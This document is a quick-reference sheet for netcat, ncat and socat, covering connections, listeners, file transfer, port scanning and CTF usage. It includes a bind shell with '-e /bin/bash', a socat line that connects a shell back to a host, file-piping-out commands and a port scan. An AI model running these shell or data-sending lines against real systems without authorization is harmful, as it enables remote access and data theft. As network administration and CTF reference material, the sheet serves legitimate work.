Netcat (nc) Quick Reference
===========================

BASIC CONNECTION
  nc host port                   Connect to host:port
  nc -v host port                Verbose connection
  nc -nv host port               No DNS, verbose

LISTENING
  nc -lp port                    Listen on port
  nc -lvp port                   Listen verbose
  nc -lp port -e /bin/bash       Bind shell (dangerous: no auth, no encryption)

DATA TRANSFER
  # Send file
  nc -lp 4444 > received.txt                    (receiver)
  nc host 4444 < send.txt                       (sender)

  # Pipe command output
  echo "data" | nc host port
  cat file | nc host port

SCANNING
  nc -zv host 1-1000             Port scan
  nc -zvw1 host 80               Single port check (-w1 = 1s timeout)

OPTIONS
  -l                             Listen mode
  -p port                        Specify port
  -v                             Verbose
  -n                             No DNS resolution
  -w seconds                     Timeout
  -z                             Zero I/O (scan mode)
  -u                             UDP mode
  -e prog                        Execute program on connect (not in OpenBSD nc)
  -k                             Keep listening after disconnect

NCAT (enhanced netcat)
  ncat --ssl host port           SSL/TLS connection
  ncat -lp port --ssl            SSL listener
  ncat --proxy proxyhost:port host port    Via proxy

SOCAT (advanced)
  socat TCP:host:port -          Basic connect
  socat TCP-LISTEN:port -        Basic listen
  socat TCP:host:port EXEC:/bin/bash   Connect shell
  socat OPENSSL:host:443 -       SSL connect

COMMON CTF PATTERNS
  # Connect to challenge
  nc challenge.ctf.com 1337

  # Send payload
  python3 -c "print('A'*100)" | nc host port

  # Send file, then stay interactive
  (cat payload; cat -) | nc host port

  # Receive then interact
  nc host port
  # type commands interactively

  # Redirect to file for analysis
  nc host port | tee output.txt
